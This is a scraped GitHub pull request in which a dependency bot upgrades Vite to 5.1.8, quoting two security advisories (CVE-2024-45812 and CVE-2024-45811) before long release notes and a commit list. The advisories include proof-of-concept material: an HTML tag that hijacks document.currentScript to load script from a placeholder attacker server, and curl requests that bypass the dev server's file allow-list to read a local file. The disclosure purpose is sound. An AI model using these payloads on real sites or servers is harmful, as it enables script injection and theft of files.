chore(deps): update dependency vite to v5 [security] #28147

renovate · 2024-10-07T10:42:20Z

This PR contains the following updates:

Package	Change	Age	Adoption	Passing	Confidence
vite (source)	`3.2.11` -> `5.1.8`

Warning

Some dependencies could not be looked up. Check the Dependency Dashboard for more information.

GitHub Vulnerability Alerts

CVE-2024-45812

Summary

We discovered a DOM Clobbering vulnerability in Vite when building scripts to cjs/iife/umd output format. The DOM Clobbering gadget in the module can lead to cross-site scripting (XSS) in web pages where scriptless attacker-controlled HTML elements (e.g., an img tag with an unsanitized name attribute) are present.

Note that, we have identified similar security issues in Webpack: GHSA-4vvj-4cpr-p986

Details

Backgrounds

DOM Clobbering is a type of code-reuse attack where the attacker first embeds a piece of non-script, seemingly benign HTML markups in the webpage (e.g. through a post or comment) and leverages the gadgets (pieces of js code) living in the existing javascript code to transform it into executable code. More for information about DOM Clobbering, here are some references:

[1] https://scnps.co/papers/sp23_domclob.pdf
[2] https://research.securitum.com/xss-in-amp4email-dom-clobbering/

Gadgets found in Vite

We have identified a DOM Clobbering vulnerability in Vite bundled scripts, particularly when the scripts dynamically import other scripts from the assets folder and the developer sets the build output format to cjs, iife, or umd. In such cases, Vite replaces relative paths starting with __VITE_ASSET__ using the URL retrieved from document.currentScript.

However, this implementation is vulnerable to a DOM Clobbering attack. The document.currentScript lookup can be shadowed by an attacker via the browser's named DOM tree element access mechanism. This manipulation allows an attacker to replace the intended script element with a malicious HTML element. When this happens, the src attribute of the attacker-controlled element is used as the URL for importing scripts, potentially leading to the dynamic loading of scripts from an attacker-controlled server.

const relativeUrlMechanisms = {
  amd: (relativePath) => {
    if (relativePath[0] !== ".") relativePath = "./" + relativePath;
    return getResolveUrl(
      `require.toUrl('${escapeId(relativePath)}'), document.baseURI`
    );
  },
  cjs: (relativePath) => `(typeof document === 'undefined' ? ${getFileUrlFromRelativePath(
    relativePath
  )} : ${getRelativeUrlFromDocument(relativePath)})`,
  es: (relativePath) => getResolveUrl(
    `'${escapeId(partialEncodeURIPath(relativePath))}', import.meta.url`
  ),
  iife: (relativePath) => getRelativeUrlFromDocument(relativePath),
  // NOTE: make sure rollup generate `module` params
  system: (relativePath) => getResolveUrl(
    `'${escapeId(partialEncodeURIPath(relativePath))}', module.meta.url`
  ),
  umd: (relativePath) => `(typeof document === 'undefined' && typeof location === 'undefined' ? ${getFileUrlFromRelativePath(
    relativePath
  )} : ${getRelativeUrlFromDocument(relativePath, true)})`
};

PoC

Considering a website that contains the following main.js script, the devloper decides to use the Vite to bundle up the program with the following configuration.

// main.js
import extraURL from './extra.js?url'
var s = document.createElement('script')
s.src = extraURL
document.head.append(s)

// extra.js
export default "https://myserver/justAnOther.js"

// vite.config.js
import { defineConfig } from 'vite'

export default defineConfig({
  build: {
    assetsInlineLimit: 0, // To avoid inline assets for PoC
    rollupOptions: {
      output: {
        format: "cjs"
      },
    },
  },
  base: "./",
});

After running the build command, the developer will get following bundle as the output.

// dist/index-DDmIg9VD.js
"use strict";const t=""+(typeof document>"u"?require("url").pathToFileURL(__dirname+"/extra-BLVEx9Lb.js").href:new URL("extra-BLVEx9Lb.js",document.currentScript&&document.currentScript.src||document.baseURI).href);var e=document.createElement("script");e.src=t;document.head.append(e);

Adding the Vite bundled script, dist/index-DDmIg9VD.js, as part of the web page source code, the page could load the extra.js file from the attacker's domain, attacker.controlled.server. The attacker only needs to insert an img tag with the name attribute set to currentScript. This can be done through a website's feature that allows users to embed certain script-less HTML (e.g., markdown renderers, web email clients, forums) or via an HTML injection vulnerability in third-party JavaScript loaded on the page.

<!DOCTYPE html>
<html>
<head>
  <title>Vite Example</title>
  <!-- Attacker-controlled Script-less HTML Element starts--!>
  <img name="currentScript" src="https://attacker.controlled.server/"></img>
  <!-- Attacker-controlled Script-less HTML Element ends--!>
</head>
<script type="module" crossorigin src="/assets/index-DDmIg9VD.js"></script>
<body>
</body>
</html>

Impact

This vulnerability can result in cross-site scripting (XSS) attacks on websites that include Vite-bundled files (configured with an output format of cjs, iife, or umd) and allow users to inject certain scriptless HTML tags without properly sanitizing the name or id attributes.

Patch

// https://github.com/vitejs/vite/blob/main/packages/vite/src/node/build.ts#L1296
const getRelativeUrlFromDocument = (relativePath: string, umd = false) =>
  getResolveUrl(
    `'${escapeId(partialEncodeURIPath(relativePath))}', ${
      umd ? `typeof document === 'undefined' ? location.href : ` : ''
    }document.currentScript && document.currentScript.tagName.toUpperCase() === 'SCRIPT' && document.currentScript.src || document.baseURI`,
  )

CVE-2024-45811

Summary

The contents of arbitrary files can be returned to the browser.

Details

@fs denies access to files outside of Vite serving allow list. Adding ?import&raw to the URL bypasses this limitation and returns the file content if it exists.

PoC

$ npm create vite@latest
$ cd vite-project/
$ npm install
$ npm run dev

$ echo "top secret content" > /tmp/secret.txt

# expected behaviour
$ curl "http://localhost:5173/@&#8203;fs/tmp/secret.txt"

    <body>
      <h1>403 Restricted</h1>
      <p>The request url &quot;/tmp/secret.txt&quot; is outside of Vite serving allow list.

# security bypassed
$ curl "http://localhost:5173/@&#8203;fs/tmp/secret.txt?import&raw"
export default "top secret content\n"
//# sourceMappingURL=data:application/json;base64,eyJ2...

Release Notes

vitejs/vite (vite)

`v5.1.8`

Compare Source

Please refer to CHANGELOG.md for details.

`v5.1.7`

Compare Source

Please refer to CHANGELOG.md for details.

`v5.1.6`

Compare Source

chore(deps): update all non-major dependencies (#16131) (a862ecb), closes #16131
fix: check for publicDir before checking if it is a parent directory (#16046) (b6fb323), closes #16046
fix: escape single quote when relative base is used (#16060) (8f74ce4), closes #16060
fix: handle function property extension in namespace import (#16113) (f699194), closes #16113
fix: server middleware mode resolve (#16122) (8403546), closes #16122
fix(esbuild): update tsconfck to fix bug that could cause a deadlock (#16124) (fd9de04), closes #16124
fix(worker): hide "The emitted file overwrites" warning if the content is same (#16094) (60dfa9e), closes #16094
fix(worker): throw error when circular worker import is detected and support self referencing worker (eef9da1), closes #16103
style(utils): remove null check (#16112) (0d2df52), closes #16112
refactor(runtime): share more code between runtime and main bundle (#16063) (93be84e), closes #16063

`v5.1.5`

Compare Source

fix: __vite__mapDeps code injection (#15732) (aff54e1), closes #15732
fix: analysing build chunk without dependencies (#15469) (bd52283), closes #15469
fix: import with query with imports field (#16085) (ab823ab), closes #16085
fix: normalize literal-only entry pattern (#16010) (1dccc37), closes #16010
fix: optimizeDeps.entries with literal-only pattern(s) (#15853) (49300b3), closes #15853
fix: output correct error for empty import specifier (#16055) (a9112eb), closes #16055
fix: upgrade esbuild to 0.20.x (#16062) (899d9b1), closes #16062
fix(runtime): runtime HMR affects only imported files (#15898) (57463fc), closes #15898
fix(scanner): respect experimentalDecorators: true (#15206) (4144781), closes #15206
revert: "fix: upgrade esbuild to 0.20.x" (#16072) (11cceea), closes #16072
refactor: share code with vite runtime (#15907) (b20d542), closes #15907
refactor(runtime): use functions from pathe (#16061) (aac2ef7), closes #16061
chore(deps): update all non-major dependencies (#16028) (7cfe80d), closes #16028

`v5.1.4`

Compare Source

perf: remove unnecessary regex s modifier (#15766) (8dc1b73), closes #15766
fix: fs cached checks disabled by default for yarn pnp (#15920) (8b11fea), closes #15920
fix: resolve directory correctly when fs.cachedChecks: true (#15983) (4fe971f), closes #15983
fix: srcSet with optional descriptor (#15905) (81b3bd0), closes #15905
fix(deps): update all non-major dependencies (#15959) (571a3fd), closes #15959
fix(watch): build watch fails when outDir is empty string (#15979) (1d263d3), closes #15979

`v5.1.3`

Compare Source

fix: cachedTransformMiddleware for direct css requests (#15919) (5099028), closes #15919
refactor(runtime): minor tweaks (#15904) (63a39c2), closes #15904
refactor(runtime): seal ES module namespace object instead of feezing (#15914) (4172f02), closes #15914

`v5.1.2`

Compare Source

fix: normalize import file path info (#15772) (306df44), closes #15772
fix(build): do not output build time when build fails (#15711) (added3e), closes #15711
fix(runtime): pass path instead of fileURL to isFilePathESM (#15908) (7b15607), closes #15908
fix(worker): support UTF-8 encoding in inline workers (fixes #12117) (#15866) (570e0f1), closes #12117 #15866
chore: update license file (#15885) (d9adf18), closes #15885
chore(deps): update all non-major dependencies (#15874) (d16ce5d), closes #15874
chore(deps): update dependency dotenv-expand to v11 (#15875) (642d528), closes #15875

`v5.1.1`

Compare Source

fix: empty CSS file was output when only .css?url is used (#15846) (b2873ac), closes #15846
fix: skip not only .js but also .mjs manifest entries (#15841) (3d860e7), closes #15841
chore: post 5.1 release edits (#15840) (9da6502), closes #15840

`v5.1.0`

Compare Source

chore: revert #15746 (#15839) (ed875f8), closes #15746 #15839
fix: pass customLogger to loadConfigFromFile (fix #15824) (#15831) (55a3427), closes #15824 #15831
fix(deps): update all non-major dependencies (#15803) (e0a6ef2), closes #15803
refactor: remove vite build --force (#15837) (f1a4242), closes #15837

`v5.0.13`

Compare Source

Please refer to CHANGELOG.md for details.

`v5.0.12`

Compare Source

Please refer to CHANGELOG.md for details.

`v5.0.11`

Compare Source

fix: don't pretransform classic script links (#15361) (19e3c9a), closes #15361
fix: inject __vite__mapDeps code before sourcemap file comment (#15483) (d2aa096), closes #15483
fix(assets): avoid splitting , inside base64 value of srcset attribute (#15422) (8de7bd2), closes #15422
fix(html): handle offset magic-string slice error (#15435) (5ea9edb), closes #15435
chore(deps): update dependency strip-literal to v2 (#15475) (49d21fe), closes #15475
chore(deps): update tj-actions/changed-files action to v41 (#15476) (2a540ee), closes #15476

`v5.0.10`

Compare Source

fix: omit protocol does not require pre-transform (#15355) (d9ae1b2), closes #15355
fix(build): use base64 for inline SVG if it contains both single and double quotes (#15271) (1bbff16), closes #15271

`v5.0.9`

Compare Source

fix: htmlFallbackMiddleware for favicon (#15301) (c902545), closes #15301
fix: more stable hash calculation for depsOptimize (#15337) (2b39fe6), closes #15337
fix(scanner): catch all external files for glob imports (#15286) (129d0d0), closes #15286
fix(server): avoid chokidar throttling on startup (#15347) (56a5740), closes #15347
fix(worker): replace import.meta correctly for IIFE worker (#15321) (08d093c), closes #15321
feat: log re-optimization reasons (#15339) (b1a6c84), closes #15339
chore: temporary typo (#15329) (7b71854), closes #15329
perf: avoid computing paths on each request (#15318) (0506812), closes #15318
perf: temporary hack to avoid fs checks for /@react-refresh (#15299) (b1d6211), closes #15299

`v5.0.8`

Compare Source

perf: cached fs utils (#15279) (c9b61c4), closes #15279
fix: missing warmupRequest in transformIndexHtml (#15303) (103820f), closes #15303
fix: public files map will be updated on add/unlink in windows (#15317) (921ca41), closes #15317
fix(build): decode urls in CSS files (fix #15109) (#15246) (ea6a7a6), closes #15109 #15246
fix(deps): update all non-major dependencies (#15304) (bb07f60), closes #15304
fix(ssr): check esm file with normal file path (#15307) (1597170), closes #15307

`v5.0.7`

Compare Source

fix: suppress terser warning if minify disabled (#15275) (3e42611), closes #15275
fix: symbolic links in public dir (#15264) (ef2a024), closes #15264
fix(html): skip inlining icon and manifest links (#14958) (8ad81b4), closes #14958
chore: remove unneeded condition in getRealPath (#15267) (8e4655c), closes #15267
perf: cache empty optimizer result (#15245) (8409b66), closes #15245

`v5.0.6`

Compare Source

perf: in-memory public files check (#15195) (0f9e1bf), closes #15195
chore: remove unneccessary eslint-disable-next-line regexp/no-unused-capturing-group (#15247) (35a5bcf), closes #15247

`v5.0.5`

Compare Source

fix: emit vite:preloadError for chunks without deps (#15203) (d8001c5), closes #15203
fix: esbuild glob import resolve error (#15140) (676804d), closes #15140
fix: json error with position (#15225) (14be75f), closes #15225
fix: proxy html path should be encoded (#15223) (5b85040), closes #15223
fix(deps): update all non-major dependencies (#15233) (ad3adda), closes #15233
fix(hmr): don't consider CSS dep as a circular dep (#15229) (5f2cdec), closes #15229
feat: add '*.mov' to client.d.ts (#15189) (d93a211), closes #15189
feat(server): allow disabling built-in shortcuts (#15218) (7fd7c6c), closes #15218
chore: replace 'some' with 'includes' in resolveEnvPrefix (#15220) (ee12f30), closes #15220
chore: update the website url for homepage in package.json (#15181) (282bd8f), closes #15181
chore: update vitest to 1.0.0-beta.6 (#15194) (2fce647), closes #15194
refactor: make HMR agnostic to environment (#15179) (0571b7c), closes #15179
refactor: use dedicated regex methods (#15228) (0348137), closes #15228
perf: remove debug only prettifyUrl call (#15204) (73e971f), closes #15204
perf: skip computing sourceRoot in injectSourcesContent (#15207) (1df1fd1), closes #15207

`v5.0.4`

Compare Source

fix: bindCLIShortcuts to proper server (#15162) (67ac572), closes #15162
fix: revert "fix: js fallback sourcemap content should be using original content (#15135)" (#15178) (d2a2493), closes #15135 #15178
fix(define): allow define process.env (#15173) (ec401da), closes #15173
fix(resolve): respect order of browser in mainFields when resolving (#15137) (4a111aa), closes #15137
feat: preserve vite.middlewares connect instance after restarts (#15166) (9474c4b), closes #15166
refactor: align with Promise.withResolvers() (#15171) (642f9bc), closes #15171

`v5.0.3`

Compare Source

fix: generateCodeFrame infinite loop (#15093) (6619de7), closes #15093
fix: js fallback sourcemap content should be using original content (#15135) (227d56d), closes #15135
fix(css): render correct asset url when CSS chunk name is nested (#15154) (ef403c0), closes #15154
fix(css): use non-nested chunk name if facadeModule is not CSS file (#15155) (811e392), closes #15155
fix(dev): bind plugin context functions (#14569) (cb3243c), closes #14569
chore(deps): update all non-major dependencies (#15145) (7ff2c0a), closes #15145
build: handle latest json-stable-stringify replacement (#15049) (bcc4a61), closes #15049

`v5.0.2`

Compare Source

fix: make htmlFallback more permissive (#15059) (6fcceeb), closes #15059

`v5.0.1`

Compare Source

test: avoid read check when running as root (#14884) (1d9516c), closes #14884
perf(hmr): skip traversed modules when checking circular imports (#15034) (41e437f), closes #15034
fix: run htmlFallbackMiddleware for no accept header requests (#15025) (b93dfe3), closes #15025
fix: update type CSSModulesOptions interface (#14987) (d0b2153), closes #14987
fix(legacy): error in build with --watch and manifest enabled (#14450) (b9ee620), closes #14450
chore: add comment about crossorigin attribute for script module (#15040) (03c371e), closes #15040
chore: cleanup v5 beta changelog (#14694) (531d3cb), closes #14694

Please refer to CHANGELOG.md for details.

`v4.5.1`

Compare Source

Please refer to CHANGELOG.md for details.

`v4.5.0`

Compare Source

Please refer to CHANGELOG.md for details.

`v4.4.12`

Compare Source

Please refer to CHANGELOG.md for details.

`v4.4.11`

Compare Source

Please refer to CHANGELOG.md for details.

`v4.4.10`

Compare Source

Please refer to CHANGELOG.md for details.

`v4.4.9`

Compare Source

chore: fix eslint warnings (#14031) (4021a0e), closes #14031
chore(deps): update all non-major dependencies (#13938) (a1b519e), closes #13938
fix: dynamic import vars ignored warning (#14006) (4479431), closes #14006
fix(build): silence warn dynamic import module when inlineDynamicImports true (#13970) (7a77aaf), closes #13970
perf: improve build times and memory utilization (#14016) (9d7d45e), closes #14016
perf: replace startsWith with === (#14005) (f5c1224), closes #14005

`v4.4.8`

Compare Source

fix: modulePreload false (#13973) (488085d), closes #13973
fix: multiple entries with shared css and no JS (#13962) (89a3db0), closes #13962
fix: use file extensions on type imports so they work with moduleResolution: 'node16' (#13947) (aeef670), closes #13947
fix(css): enhance error message for missing preprocessor dependency (#11485) (65e5c22), closes #11485
fix(esbuild): fix static properties transpile when useDefineForClassFields false (#13992) (4ca7c13), closes #13992
fix(importAnalysis): strip url base before passing as safeModulePaths (#13712) (1ab06a8), closes #13712
fix(importMetaGlob): avoid unnecessary hmr of negative glob (#13646) (844451c), closes #13646
fix(optimizer): avoid double-commit of optimized deps when discovery is disabled (#13865) (df77991), closes #13865
fix(optimizer): enable experimentalDecorators by default (#13981) (f8a5ffc), closes #13981
perf: replace startsWith with === (#13989) (3aab14e), closes #13989
perf: single slash does not need to be replaced (#13980) (66f522c), closes #13980
perf: use Intl.DateTimeFormatter instead of toLocaleTimeString (#13951) (af53a1d), closes #13951
perf: use Intl.NumberFormat instead of toLocaleString (#13949) (a48bf88), closes #13949
perf: use magic-string hires boundary for sourcemaps (#13971) (b9a8d65), closes #13971
chore(reporter): remove unnecessary map (#13972) (dd9d4c1), closes #13972
refactor: add new overload to the type of defineConfig (#13958) (24c12fe), closes #13958

`v4.4.7`

Compare Source

fix: optimizeDeps.include not working with paths inside packages (#13922) (06e4f57), closes #13922
fix: lightningcss fails with html-proxy (#13776) (6b56094), closes #13776
fix: prepend config.base to vite/env path (#13941) (8e6cee8), closes #13941
fix(html): support import.meta.env define replacement without quotes (#13425) (883089c), closes #13425
fix(proxy): handle error when proxy itself errors (#13929) (4848e41), closes #13929
chore(eslint): allow type annotations (#13920) (d1264fd), closes #13920

`v4.4.6`

Compare Source

fix: constrain inject helpers for iife (#13909) (c89f677), closes #13909
fix: display manualChunks warning only when a function is not used (#13797) (#13798) (51c271f), closes #13797 #13798
fix: do not append browserHash on optimized deps during build (#13906) (0fb2340), closes #13906
fix: use Bun's implementation of ws instead of the bundled one (#13901) (049404c), closes #13901
feat(client): add guide to press Esc for closing the overlay (#13896) (da389cc), closes #13896

`v4.4.5`

Compare Source

fix: "EISDIR: illegal operation on a directory, realpath" error on RA… (#13655) (6bd5434), closes #13655
fix: transform error message add file info (#13687) (6dca41c), closes #13687
fix: warn when publicDir and outDir are nested (#13742) (4eb3154), closes #13742
fix(build): remove warning about ineffective dynamic import from node_modules (#13884) (33002dd), closes #13884
fix(build): style insert order for UMD builds (fix #13668) (#13669) (49a1b99), closes #13668 #13669
fix(deps): update all non-major dependencies (#13872) (975a631), closes #13872
fix(types): narrow down the return type of defineConfig (#13792) (c971f26), closes #13792
chore: fix typos (#13862) (f54e8da), closes #13862
chore: replace any with string (#13850) (4606fd8), closes #13850
chore(deps): update dependency prettier to v3 (#13759) (5a56941), closes #13759
docs: fix build.cssMinify link (#13840) (8a2a3e1), closes

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Enabled.

♻ Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.

If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.

Core: fix imports Core: fix imports for templates Core: fix/ignore eslint errors Core: fix most of typescript issues Core: fix most of extraneous TS errors (mostly redundant ts-expect-error) Core: fix/ignore remaining extraneous errors Core: fix broken renovation import Core: fixed callOnce import Core: fix TS lint errors Core: fix component_registrator_callbacks reexport Core: fixed missed Data reexport + silence Mock TS error Core: fixed unwanted refactoring for renderer (using array methods on array-like objects) Core: add missing template reexport Core: fix artifacts of auto-replace Core: Fix data and utils modules Core: fix Error constructor Core: fix viewport IIFE after lint changes and add it to lint ignore Core: TEST - add lint ignore for all core, bring back changes, that seem significant to see how they impact test Core: TEST - bring back non-significant cahanges to see if they impact tests Core: fix tests for editors and core Core: fix qunit part 2 Core: common default export + bring back executeAsyncMock 10 line Core: fix textbox hanging test (blur) Core: fix test Html editor - PopupModule mock window Core: fix transitionExecutor + datebox knockout tests Core: fix animation/fx tests Core: fix animation/fx test part 2 Core: fix imageCreator exporter test Core: fix defaultOption tests Map - deprecate Bing provider (DevExpress#28127) GridBaseOptions.columnFixing.texts.stickPosition -> GridBaseOptions.columnFixing.texts.stickyPosition (DevExpress#28133) Co-authored-by: Roman Semenov MultiView: improve swipe UX when some items are hidden (DevExpress#28128) Fix CodeQL report errors (DevExpress#27874) Selection: fix selection cache updating after selection change is canceled (DevExpress#28141) Replace get-changed-files action with the shared one (DevExpress#28140) MultiView: Add unit tests for keyboard navigation with hidden items (DevExpress#28137) chore(deps): update dependency vite to v5 [security] (DevExpress#28147) Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> chore(deps): update pnpm to v9.11.0 (DevExpress#28158) Co-authored-by: renovate[bot] <29139614+renovate[bot]@users.noreply.github.com> HtmlEditor: Get rid of showdown Co-authored-by: marker dao ® <[email protected]> Co-authored-by: Roman Semenov <[email protected]> 🎹 Pager: Create d.ts (DevExpress#28055) Co-authored-by: alexlavrov <[email protected]> Co-authored-by: ilyakhd <[email protected]> Co-authored-by: Roman Semenov <[email protected]> Pager - rename filename (DevExpress#28163) HtmlEditor: Get rid of turndown dxDiagram - fix T1251559, T1254101 (DevExpress#28168) HtmlEditor: Remove markdown support Map - add Azure provider in declarations (DevExpress#28126) Chat: add empty view stories (DevExpress#28173) Chat: Skip message rendering on send message (DevExpress#28170) Co-authored-by: marker dao ® <[email protected]> Refix "Storybook - fix project config (DevExpress#28085)" (DevExpress#28144) Scheduler a11y: appointments does not have info about reccurence (DevExpress#28165) Map - support Azure provider (DevExpress#28122) Core: fix azure provider TS error Core: fix m_svg to contain default export Core: fix popup test Core: fix regular popup tests Core: Fix toolbar + loadIndicator Core: Fix viz pieChart + rangeSelector Core: fix desktopTooltip test Core: fix ui-firefox Core: Replace all imports Action, devices -> m_action, m_devices Core: domAdapter -> m_dom_adapter tests Core: fix m_action export Core: replace import support -> m_support Core: dom -> m_dom;: common, type -> m_ only for helpers Core: fix ui-firefox single test failures Core: fix rowsView test Core: fix pivotGrid async mocks Core: fix pivotGrid dataSource.bundled Core: dataSource bundled add missing inflector import Core: internal support -> m_support Core: use ts device in events to try to fix mobile tests Core: remove unexpected ts-error Core: replace dom->m_dom click event Core: fix scrollable test (in mobileViewport) Fix eslint rules and apply them to utils, templates, options and ignore errors Core: modify eslint config, save core files Core: fix metadata Core: fix TS lint

renovate bot added the dependencies Pull requests that update a dependency file label Oct 7, 2024

github-actions bot approved these changes Oct 7, 2024

View reviewed changes

chore(deps): update dependency vite to v5 [security]

b2d0ea2

renovate bot force-pushed the renovate/npm-vite-vulnerability branch from cfa1c82 to b2d0ea2 Compare October 7, 2024 10:56

renovate bot merged commit 677ec57 into 24_2 Oct 7, 2024
278 checks passed

renovate bot deleted the renovate/npm-vite-vulnerability branch October 7, 2024 16:12

Provide feedback

Saved searches

Use saved searches to filter your results more quickly

chore(deps): update dependency vite to v5 [security] #28147

chore(deps): update dependency vite to v5 [security] #28147

renovate bot commented Oct 7, 2024 •

edited

Loading

chore(deps): update dependency vite to v5 [security] #28147

chore(deps): update dependency vite to v5 [security] #28147

Conversation

renovate bot commented Oct 7, 2024 • edited Loading

GitHub Vulnerability Alerts

Summary

Details

PoC

Impact

Patch

Summary

Details

PoC

Release Notes

Configuration

renovate bot commented Oct 7, 2024 •

edited

Loading